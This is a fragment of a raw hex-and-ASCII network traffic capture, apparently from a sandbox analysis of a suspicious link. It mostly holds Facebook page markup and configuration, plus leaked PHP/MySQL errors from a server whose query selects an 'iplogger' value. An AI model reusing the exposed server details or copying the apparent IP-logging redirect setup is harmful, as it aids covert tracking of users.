1'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20colo
2022-10-07 13:59:47 UTC	888	IN	Data Raw: 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 6f 42 2f 79 58 67 33 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 6f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 58 48 77 75 41 5f 5f 34 32 41 66 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 34 42 47 54 6d 43 37 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 Data Ascii: .css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="oB/yXg3" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/0,cross/XHwuA__42Af.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="4BGTmC7" /><link type="text/css" rel="sty
2022-10-07 13:59:47 UTC	889	IN	Data Raw: 54 34 5f 5a 51 69 30 73 54 6a 53 74 2d 52 78 35 4e 4d 22 7d 2c 22 38 31 32 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 55 37 71 47 30 36 70 39 73 46 36 75 38 75 69 63 22 7d 2c 22 36 37 36 38 33 38 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 6e 4e 31 65 68 54 39 79 71 2d 32 71 36 6e 31 73 22 7d 2c 22 31 32 31 37 31 35 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 42 37 59 6d 6c 6c 4f 73 41 72 6e 4b 36 54 6f 73 22 7d 2c 22 31 35 35 34 38 32 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 7a 75 65 47 4c 68 47 6f 30 63 54 35 78 67 78 4d 22 7d 2c 22 31 37 33 38 34 38 36 22 3a 7b 22 72 65 Data Ascii: T4_ZQi0sTjSt-Rx5NM"},"8126":{"result":false,"hash":"AT4U7qG06p9sF6u8uic"},"676838":{"result":false,"hash":"AT6nN1ehT9yq-2q6n1s"},"1217157":{"result":false,"hash":"AT6B7YmllOsArnK6Tos"},"1554827":{"result":false,"hash":"AT7zueGLhGo0cT5xgxM"},"1738486":{"re
2022-10-07 13:59:47 UTC	891	IN	Data Raw: 30 30 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 77 64 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 78 2d 72 65 66 65 72 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 78 2d 73 72 63 22 3a 7b 22 74 22 3a 31 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 7d 2c 32 31 30 34 5d 2c 5b 22 43 75 72 72 65 6e 74 43 6f 6d 6d 75 6e 69 74 79 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 7d 2c 34 39 30 5d 2c 5b 22 43 75 72 72 65 6e 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 2c 5b 5d 2c 7b 22 66 61 63 65 62 6f 6f 6b 64 6f 74 63 6f 6d 22 3a 74 72 75 65 2c 22 6d 65 73 73 65 6e 67 65 72 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 77 6f 72 6b 70 6c 61 63 65 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 69 6e 73 74 61 67 72 61 6d 64 6f 74 63 6f 6d Data Ascii: 00,"s":"Lax"},"wd":{"t":604800,"s":"Lax"},"x-referer":{"s":"None"},"x-src":{"t":1,"s":"None"}},2104],["CurrentCommunityInitialData",[],{},490],["CurrentEnvironment",[],{"facebookdotcom":true,"messengerdotcom":false,"workplacedotcom":false,"instagramdotcom
2022-10-07 13:59:47 UTC	892	IN	Data Raw: 22 76 65 72 73 69 6f 6e 22 3a 32 2c 22 73 68 6f 75 6c 64 5f 72 61 6e 64 6f 6d 69 7a 65 22 3a 66 61 6c 73 65 7d 2c 32 31 31 31 5d 2c 5b 22 55 73 65 72 41 67 65 6e 74 44 61 74 61 22 2c 5b 5d 2c 7b 22 62 72 6f 77 73 65 72 41 72 63 68 69 74 65 63 74 75 72 65 22 3a 22 36 34 22 2c 22 62 72 6f 77 73 65 72 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 62 72 6f 77 73 65 72 4d 69 6e 6f 72 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 62 72 6f 77 73 65 72 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 62 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 64 65 76 69 63 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 56 65 72 73 69 6f 6e 22 3a 6e 75 Data Ascii: "version":2,"should_randomize":false},2111],["UserAgentData",[],{"browserArchitecture":"64","browserFullVersion":null,"browserMinorVersion":null,"browserName":"Unknown","browserVersion":null,"deviceName":"Unknown","engineName":"Unknown","engineVersion":nu
2022-10-07 13:59:47 UTC	894	IN	Data Raw: 2c 22 53 52 54 5f 42 41 4e 5a 41 49 5f 53 52 54 5f 43 4f 52 45 5f 4c 4f 47 47 45 52 22 2c 22 53 52 54 5f 42 41 4e 5a 41 49 5f 53 52 54 5f 4d 41 49 4e 5f 4c 4f 47 47 45 52 22 2c 22 57 4f 52 4b 50 4c 41 43 45 5f 50 4c 41 54 46 4f 52 4d 5f 53 45 43 55 52 45 5f 41 50 50 53 5f 4d 41 49 4c 42 4f 58 45 53 22 2c 22 50 4f 43 4b 45 54 5f 4d 4f 4e 53 54 45 52 53 5f 55 50 44 41 54 45 5f 4e 41 4d 45 22 2c 22 49 43 5f 44 49 53 41 42 4c 45 5f 4d 45 52 47 45 5f 54 4f 4f 4c 5f 46 45 45 44 5f 43 48 45 43 4b 5f 46 4f 52 5f 52 45 50 4c 41 43 45 5f 53 43 48 45 44 55 4c 45 22 2c 22 41 44 53 5f 45 50 44 5f 49 4d 50 41 43 54 45 44 5f 41 44 56 45 52 54 49 53 45 52 5f 4d 49 47 52 41 54 45 5f 58 43 4f 4e 54 52 4f 4c 4c 45 52 22 2c 22 52 45 43 52 55 49 54 49 4e 47 5f 43 41 4e 44 49 Data Ascii: ,"SRT_BANZAI_SRT_CORE_LOGGER","SRT_BANZAI_SRT_MAIN_LOGGER","WORKPLACE_PLATFORM_SECURE_APPS_MAILBOXES","POCKET_MONSTERS_UPDATE_NAME","IC_DISABLE_MERGE_TOOL_FEED_CHECK_FOR_REPLACE_SCHEDULE","ADS_EPD_IMPACTED_ADVERTISER_MIGRATE_XCONTROLLER","RECRUITING_CANDI
2022-10-07 13:59:47 UTC	895	IN	Data Raw: 69 74 2e 73 6b 79 2e 63 6f 6d 22 2c 22 67 72 61 70 68 69 74 65 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 22 2c 22 77 77 77 2e 6b 66 63 2e 63 6f 2e 74 68 22 2c 22 6c 65 61 72 6e 2e 70 61 6e 74 68 65 6f 6e 2e 69 6f 22 2c 22 77 77 77 2e 6c 61 6e 64 6d 61 72 6b 73 68 6f 70 73 2e 69 6e 22 2c 22 77 77 77 2e 6e 63 6c 2e 63 6f 6d 22 2c 22 73 30 2e 77 70 2e 63 6f 6d 22 2c 22 77 77 77 2e 74 61 74 61 63 6c 69 71 2e 63 6f 6d 22 2c 22 62 73 2e 73 65 72 76 69 6e 67 2d 73 79 73 2e 63 6f 6d 22 2c 22 6b 6f 68 6c 73 2e 63 6f 6d 22 2c 22 6c 61 7a 61 64 61 2e 63 6f 2e 74 68 22 2c 22 78 67 34 6b 65 6e 2e 63 6f 6d 22 2c 22 74 65 63 68 6e 6f 70 61 72 6b 2e 72 75 22 2c 22 6f 66 66 69 63 65 64 65 70 6f 74 2e 63 6f 6d 2e 6d 78 22 2c 22 62 65 73 74 62 75 79 2e 63 6f 6d 2e 6d 78 22 Data Ascii: it.sky.com","graphite.instagram.com","www.kfc.co.th","learn.pantheon.io","www.landmarkshops.in","www.ncl.com","s0.wp.com","www.tatacliq.com","bs.serving-sys.com","kohls.com","lazada.co.th","xg4ken.com","technopark.ru","officedepot.com.mx","bestbuy.com.mx"
2022-10-07 13:59:47 UTC	896	IN	Data Raw: 7c 5e 29 22 2c 22 5c 2f 5f 45 5c 2f 22 3a 22 28 5b 2e 2c 21 3f 5c 5c 73 5d 7c 24 29 22 7d 2c 22 70 61 74 74 65 72 6e 73 22 3a 7b 22 5c 2f 5c 75 30 30 30 31 28 2e 2a 29 28 27 7c 26 23 30 33 39 3b 29 73 5c 75 30 30 30 31 28 3f 3a 27 7c 26 23 30 33 39 3b 29 73 28 2e 2a 29 5c 2f 22 3a 22 5c 75 30 30 30 31 24 31 24 32 73 5c 75 30 30 30 31 24 33 22 2c 22 5c 2f 5f 5c 75 30 30 30 31 28 5b 5e 5c 75 30 30 30 31 5d 2a 29 5c 75 30 30 30 31 5c 2f 22 3a 22 6a 61 76 61 73 63 72 69 70 74 22 7d 7d 2c 31 34 39 36 5d 2c 5b 22 49 6e 74 6c 56 69 65 77 65 72 43 6f 6e 74 65 78 74 22 2c 5b 5d 2c 7b 22 47 45 4e 44 45 52 22 3a 33 2c 22 72 65 67 69 6f 6e 61 6c 4c 6f 63 61 6c 65 22 3a 6e 75 6c 6c 7d 2c 37 37 32 5d 2c 5b 22 4e 75 6d 62 65 72 46 6f 72 6d 61 74 43 6f 6e 66 69 67 22 2c Data Ascii: \|^)","\/_E\/":"([.,!?\\s]\|$)"},"patterns":{"\/\u0001(.)('\|')s\u0001(?:'\|')s(.)\/":"\u0001$1$2s\u0001$3","\/_\u0001([^\u0001]*)\u0001\/":"javascript"}},1496],["IntlViewerContext",[],{"GENDER":3,"regionalLocale":null},772],["NumberFormatConfig",
2022-10-07 13:59:47 UTC	898	IN	Data Raw: 63 6b 5c 2f 22 3a 31 2c 22 5c 2f 65 78 69 74 64 73 69 74 65 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 70 69 78 65 6c 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 63 61 72 72 69 65 72 5f 6c 61 6e 64 69 6e 67 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 66 6c 65 78 5c 2f 6c 6f 67 67 69 6e 67 5c 2f 22 3a 31 2c 22 5c 2f 74 72 22 3a 31 2c 22 5c 2f 74 72 5c 2f 22 3a 31 2c 22 5c 2f 73 65 6d 5f 63 61 6d 70 61 69 67 6e 73 5c 2f 73 65 6d 5f 70 69 78 65 6c 5f 74 65 73 74 5c 2f 22 3a 31 2c 22 5c 2f 62 6f 6f 6b 6d 61 72 6b 73 5c 2f 66 6c 79 6f 75 74 5c 2f 62 6f 64 79 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 73 75 62 6e 6f 5c 2f 22 3a 31 2c 22 5c 2f Data Ascii: ck\/":1,"\/exitdsite":1,"\/zero\/balance\/pixel\/":1,"\/zero\/balance\/":1,"\/zero\/balance\/carrier_landing\/":1,"\/zero\/flex\/logging\/":1,"\/tr":1,"\/tr\/":1,"\/sem_campaigns\/sem_pixel_test\/":1,"\/bookmarks\/flyout\/body\/":1,"\/zero\/subno\/":1,"\/
2022-10-07 13:59:47 UTC	899	IN	Data Raw: 61 6e 5c 2f 62 75 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 73 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 5c 2f 63 68 61 6e 6e 65 6c 5c 2f 72 65 63 6f 6e 6e 65 63 74 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 5c 2f 6e 75 78 5c 2f 77 69 7a 61 72 64 5c 2f 6e 61 76 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 70 70 72 65 67 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 62 69 72 74 68 64 61 79 5f 68 65 6c 70 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 6c 6f 67 69 6e 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 72 2e 70 68 70 22 3a Data Ascii: an\/buy\/":1,"\/upsell\/sms\/":1,"\/wap\/a\/channel\/reconnect.php":1,"\/wap\/a\/nux\/wizard\/nav.php":1,"\/wap\/appreg.php":1,"\/wap\/birthday_help.php":1,"\/wap\/c.php":1,"\/wap\/confirmemail.php":1,"\/wap\/cr.php":1,"\/wap\/login.php":1,"\/wap\/r.php":
2022-10-07 13:59:47 UTC	901	IN	Data Raw: 49 22 2c 22 61 70 70 5f 69 64 22 3a 22 32 35 36 32 38 31 30 34 30 35 35 38 22 2c 22 65 6e 61 62 6c 65 5f 62 6c 61 64 65 72 75 6e 6e 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 61 63 6b 22 3a 74 72 75 65 2c 22 70 75 73 68 5f 70 68 61 73 65 22 3a 22 43 33 22 2c 22 65 6e 61 62 6c 65 5f 6f 62 73 65 72 76 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 64 61 74 61 6c 6f 73 73 5f 74 69 6d 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 66 61 6c 6c 62 61 63 6b 5f 66 6f 72 5f 62 72 22 3a 74 72 75 65 2c 22 66 69 78 5f 62 72 5f 69 6e 69 74 5f 72 63 22 3a 66 61 6c 73 65 2c 22 71 75 65 75 65 5f 61 63 74 69 76 61 74 69 6f 6e 5f 65 78 70 65 72 69 6d 65 6e 74 22 3a 66 61 6c 73 65 2c 22 6d 61 78 5f 64 65 6c 61 79 5f 62 72 5f 71 75 65 75 65 22 3a 36 Data Ascii: I","app_id":"256281040558","enable_bladerunner":false,"enable_ack":true,"push_phase":"C3","enable_observer":false,"enable_dataloss_timer":false,"enable_fallback_for_br":true,"fix_br_init_rc":false,"queue_activation_experiment":false,"max_delay_br_queue":6
2022-10-07 13:59:47 UTC	902	IN	Data Raw: 5b 22 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 42 6c 75 65 22 2c 22 41 61 33 65 53 67 54 42 36 53 31 6e 73 75 5a 5f 4a 59 30 42 71 5f 73 77 53 4f 4f 77 30 70 6f 4a 54 7a 59 53 6e 73 70 55 34 4e 61 6c 4c 63 65 78 32 79 78 4c 5a 49 4a 73 4e 6f 68 75 70 4c 32 73 56 65 76 44 68 64 31 4c 76 4e 55 5f 52 6e 51 47 31 56 65 52 66 69 6c 39 4b 41 6f 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 38 33 35 37 39 22 2c 5b 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 49 6d 70 6c 22 2c 22 41 61 33 65 53 67 54 42 36 53 31 6e 73 75 5a 5f 4a 59 30 42 71 5f 73 77 53 4f 4f 77 30 70 6f 4a 54 7a 59 53 6e 73 70 55 34 4e 61 6c 4c 63 65 78 32 79 78 4c 5a 49 4a 73 4e 6f 68 75 70 4c 32 73 Data Ascii: ["clearIntervalBlue","Aa3eSgTB6S1nsuZ_JY0Bq_swSOOw0poJTzYSnspU4NalLcex2yxLZIJsNohupL2sVevDhd1LvNU_RnQG1VeRfil9KAo"]},-1],["cr:1183579",["InlineFbtResultImpl"],{"__rc":["InlineFbtResultImpl","Aa3eSgTB6S1nsuZ_JY0Bq_swSOOw0poJTzYSnspU4NalLcex2yxLZIJsNohupL2s
2022-10-07 13:59:47 UTC	904	IN	Data Raw: 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 7d 2c 32 33 39 33 5d 2c 5b 22 49 6e 74 6c 43 75 72 72 65 6e 74 4c 6f 63 61 6c 65 22 2c 5b 5d 2c 7b 22 63 6f 64 65 22 3a 22 65 6e 5f 55 53 22 7d 2c 35 39 35 34 5d 2c 5b 22 55 53 49 44 4d 65 74 61 64 61 74 61 22 2c 5b 5d 2c 7b 22 62 72 6f 77 73 65 72 5f 69 64 22 3a 22 3f 22 2c 22 74 61 62 5f 69 64 22 3a 22 22 2c 22 70 61 67 65 5f 69 64 22 3a 22 50 72 6a 64 79 76 6e 79 66 67 30 65 69 22 2c 22 74 72 61 6e 73 69 74 69 6f 6e 5f 69 64 22 3a 30 2c 22 76 65 72 73 69 6f 6e 22 3a 36 7d 2c 35 38 38 38 5d 2c 5b 22 63 72 3a 36 38 36 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 33 57 38 44 70 5a 50 69 44 6e 69 78 6a 39 68 65 41 2d 72 68 65 6a 35 74 51 43 62 77 59 39 73 59 48 5a 6a 35 51 62 4f 50 47 65 54 52 6e 53 Data Ascii: Config",[],{},2393],["IntlCurrentLocale",[],{"code":"en_US"},5954],["USIDMetadata",[],{"browser_id":"?","tab_id":"","page_id":"Prjdyvnyfg0ei","transition_id":0,"version":6},5888],["cr:686",[],{"__rc":[null,"Aa3W8DpZPiDnixj9heA-rhej5tQCbwY9sYHZj5QbOPGeTRnS
2022-10-07 13:59:47 UTC	905	IN	Data Raw: 69 74 6c 65 3d 22 47 6f 20 74 6f 20 46 61 63 65 62 6f 6f 6b 20 68 6f 6d 65 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 62 5f 6c 6f 67 6f 20 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 39 31 36 37 64 36 22 3e 3c 75 3e 46 61 63 65 62 6f 6f 6b 3c 2f 75 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 79 6c 34 20 72 66 6c 6f 61 74 20 5f 6f 68 66 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 22 72 6f 79 61 6c 5f 6c 6f 67 69 6e 5f 66 6f 72 6d 22 3e 3c 61 20 68 72 65 66 3d 22 2f 22 20 69 64 3d 22 75 5f 30 5f 30 5f 66 6f 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 77 68 69 74 65 22 3e 4a 6f 69 6e 20 6f 72 20 4c 6f 67 20 49 6e 74 6f 20 46 61 63 65 62 6f 6f 6b 20 e2 80 89 20 3c 69 Data Ascii: itle="Go to Facebook home"><i class="fb_logo img sp_ot1t5YjYL3s sx_9167d6"><u>Facebook</u></i></a></h1></div><div class="_yl4 rfloat _ohf" data-testid="royal_login_form"><a href="/" id="u_0_0_fo"><span style="color: white">Join or Log Into Facebook <i
2022-10-07 13:59:47 UTC	907	IN	Data Raw: 3d 22 6f 66 66 22 20 6e 61 6d 65 3d 22 74 69 6d 65 7a 6f 6e 65 22 20 76 61 6c 75 65 3d 22 22 20 69 64 3d 22 75 5f 30 5f 33 5f 4c 53 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 6e 61 6d 65 3d 22 6c 67 6e 64 69 6d 22 20 76 61 6c 75 65 3d 22 22 20 69 64 3d 22 75 5f 30 5f 34 5f 64 74 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6c 67 6e 72 6e 64 22 20 76 61 6c 75 65 3d 22 30 36 35 39 34 37 5f 54 75 31 72 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 6c 67 6e 6a 73 22 20 6e 61 6d 65 3d 22 6c 67 6e 6a 73 22 20 76 61 6c 75 65 3d 22 6e 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 Data Ascii: ="off" name="timezone" value="" id="u_0_3_LS" /><input type="hidden" autocomplete="off" name="lgndim" value="" id="u_0_4_dt" /><input type="hidden" name="lgnrnd" value="065947_Tu1r" /><input type="hidden" id="lgnjs" name="lgnjs" value="n" /><input type="h
2022-10-07 13:59:47 UTC	908	IN	Data Raw: 65 3d 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 76 6c 20 5f 34 2d 64 6f 22 3e 3c 68 32 20 63 6c 61 73 73 3d 22 5f 34 2d 64 70 22 3e 54 68 69 73 20 70 61 67 65 20 69 73 6e 26 23 30 33 39 3b 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 3c 68 33 20 63 6c 61 73 73 3d 22 5f 34 2d 64 71 22 3e 54 68 65 20 6c 69 6e 6b 20 79 6f 75 20 66 6f 6c 6c 6f 77 65 64 20 6d 61 79 20 62 65 20 62 72 6f 6b 65 6e 2c 20 6f 72 20 74 68 65 20 70 61 67 65 20 6d 61 79 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2e 3c 2f 68 33 3e 3c 69 20 63 6c 61 73 73 3d 22 6d 76 6c 20 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 37 37 38 38 63 30 22 3e 3c 2f 69 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 62 6c 20 70 76 6c 20 5f 34 2d 64 72 20 66 73 Data Ascii: e="main"><div class="pvl _4-do"><h2 class="_4-dp">This page isn't available</h2><h3 class="_4-dq">The link you followed may be broken, or the page may have been removed.</h3><i class="mvl img sp_ot1t5YjYL3s sx_7788c0"></i><div class="mbl pvl _4-dr fs
2022-10-07 13:59:47 UTC	910	IN	Data Raw: 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 Data Ascii: %3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhos
2022-10-07 13:59:47 UTC	911	IN	Data Raw: 65 6d 6f 76 65 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 74 68 65 5c 75 30 30 32 35 32 30 66 75 74 75 72 65 3a 5c 75 30 30 32 35 32 30 75 73 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 30 32 35 32 30 69 6e 73 74 65 61 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 Data Ascii: emoved\u002520in\u002520the\u002520future:\u002520use\u002520mysqli\u002520or\u002520PDO\u002520instead\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u
2022-10-07 13:59:47 UTC	913	IN	Data Raw: 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 65 72 5c 75 30 30 32 35 32 30 66 72 6f 6d 5c 75 30 30 32 35 32 30 74 5f 63 68 61 6e 6e 65 6c 73 5c 75 30 30 32 35 32 30 77 68 65 72 65 5c 75 30 30 32 35 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c Data Ascii: 2520password:\u002520YES)\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253Eselect\u002520iplogger\u002520from\u002520t_channels\u002520where\u002520name='38b2c7a1af454d382927f81543d86055886bc02863457'\u002520limit\u0025200,1\u00253Cbr\u00253E\u00250A\
2022-10-07 13:59:47 UTC	914	IN	Data Raw: 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a Data Ascii: .136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:
